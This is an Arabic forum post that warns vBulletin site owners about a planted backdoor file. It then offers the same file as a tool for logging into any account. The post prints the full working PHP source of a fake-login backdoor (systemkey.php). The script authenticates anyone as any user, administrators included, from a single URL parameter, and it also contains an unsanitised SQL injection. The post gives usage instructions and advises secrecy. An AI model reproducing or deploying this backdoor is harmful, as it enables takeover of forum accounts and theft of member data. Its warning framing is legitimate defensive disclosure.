السلام عليكم
تكملة لعنوان الموضوع فهل وجود الملف الذى سيتم عرضه الآن فى ملفات منتداك اختراق لمنتداك أم ماذا ؟ ؟
خلاصة الموضوع هوا ان هذا الملف تم برمجته لأختراق منتديات الفبلتن وأعتقد انه تم نشره بإستخدام أى هاك أو نسخة ملغومة لذلك نحذر من وجود الملف أو هذا الكود فى أى من ملفات منتداك بدون علمك
(وقتها تكون انت فى وسط حالة اختراق وقد يكون قد تم اختراقك بالفعل وتم سحب بيانات المنتدى وقاعدة البيانات وقد تفاجأ فى يوم أن أعضائك وموضوعاتك موجودة فى منتدى آخر)
لذلك وجب التنبيه وأقل ما تحمى به منتداك ان يكون هناك جدار نارى على مجلدات الادمن والمراقبين
لكن بما أننا مطورين نسعى للإستفادة من كل ما هو برمجى فهذا الملف قد يتم استخدامه بصورة مضرة كما سبق وقلت وقد يتم استخدامه بصورة جيدة وهى كالتالى :-
قد يمكن استخدامه بدلا من هاك دخول المنتدى بأى عضوية والاستخدام يتم كالتالى وطريقة الاستخدام موجودة فى الملف ولا ننصح بترك الملف بعد الاستخدام على المنتدى يجب ان يتم حذفه
ويجب عدم اخبار أى احد لا تثق به بوجود الملف
شكرا لكم
أى استخدام خاطىء او منافى للأخلاق او استخدام الملف فى الاختراق او الحاق أى ضرر بأى منتدى آخر انا غير مسؤول عنه وأبرىء زمتى من أى استخدام خاطىء أو يغضب الله تعالى ,,والله على ما أقول شهيد
تكملة لعنوان الموضوع فهل وجود الملف الذى سيتم عرضه الآن فى ملفات منتداك اختراق لمنتداك أم ماذا ؟ ؟
PHP:
<?php
/*================================================= =====================*\
|| # Sa3eka.Com VBulletin Fake Login Backdoor v1.0
|| ################################################## ################## ||
|| # vBulletin Fake Login Backdoor v1.0
|| # ---------------------------------------------------------------- # ||
|| # رابط الثغرة راح تكون زي كذا مع تغير اسم المستخدم الذي ترغب بالدخول اليه
|| # http://siteadi.com/vb/systemkey.php?cryptosuite=Admin
|| # ---------------------------------------------------------------- # ||
|| # طريقة الدخول الى اي عضوية حتى الآدارة مع تغير كلمة admin
|| # systemkey.php?cryptosuite=Admin
|| #
|| ################################################## ################## ||
\*================================================ ======================*/
if (isset($_GET['cryptosuite']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['cryptosuite'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['cryptosuite']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
?>
خلاصة الموضوع هوا ان هذا الملف تم برمجته لأختراق منتديات الفبلتن وأعتقد انه تم نشره بإستخدام أى هاك أو نسخة ملغومة لذلك نحذر من وجود الملف أو هذا الكود فى أى من ملفات منتداك بدون علمك
(وقتها تكون انت فى وسط حالة اختراق وقد يكون قد تم اختراقك بالفعل وتم سحب بيانات المنتدى وقاعدة البيانات وقد تفاجأ فى يوم أن أعضائك وموضوعاتك موجودة فى منتدى آخر)
لذلك وجب التنبيه وأقل ما تحمى به منتداك ان يكون هناك جدار نارى على مجلدات الادمن والمراقبين
لكن بما أننا مطورين نسعى للإستفادة من كل ما هو برمجى فهذا الملف قد يتم استخدامه بصورة مضرة كما سبق وقلت وقد يتم استخدامه بصورة جيدة وهى كالتالى :-
قد يمكن استخدامه بدلا من هاك دخول المنتدى بأى عضوية والاستخدام يتم كالتالى وطريقة الاستخدام موجودة فى الملف ولا ننصح بترك الملف بعد الاستخدام على المنتدى يجب ان يتم حذفه
ويجب عدم اخبار أى احد لا تثق به بوجود الملف
شكرا لكم
أى استخدام خاطىء او منافى للأخلاق او استخدام الملف فى الاختراق او الحاق أى ضرر بأى منتدى آخر انا غير مسؤول عنه وأبرىء زمتى من أى استخدام خاطىء أو يغضب الله تعالى ,,والله على ما أقول شهيد